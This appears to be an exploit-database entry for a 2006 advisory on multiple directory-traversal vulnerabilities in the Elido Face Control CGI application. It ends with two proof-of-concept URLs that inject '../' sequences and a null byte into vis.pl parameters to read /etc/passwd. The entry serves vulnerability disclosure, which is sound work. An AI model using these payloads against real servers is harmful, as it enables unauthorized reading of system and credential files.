[] NeoSense

Elido Face Control - Multiple Directory Traversal Vulnerabilities

Author: HSC Security Group
type: webapps
platform: cgi
port: 
date_added: 2006-01-26 
date_updated: 2013-07-28 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/16401/info

Face Control is prone to multiple directory-traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.

http://www.example.com/cgi-bin/e-cms/vis/vis.pl?s=001&p=../../../../etc/passwd%00

http://www.example.com/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00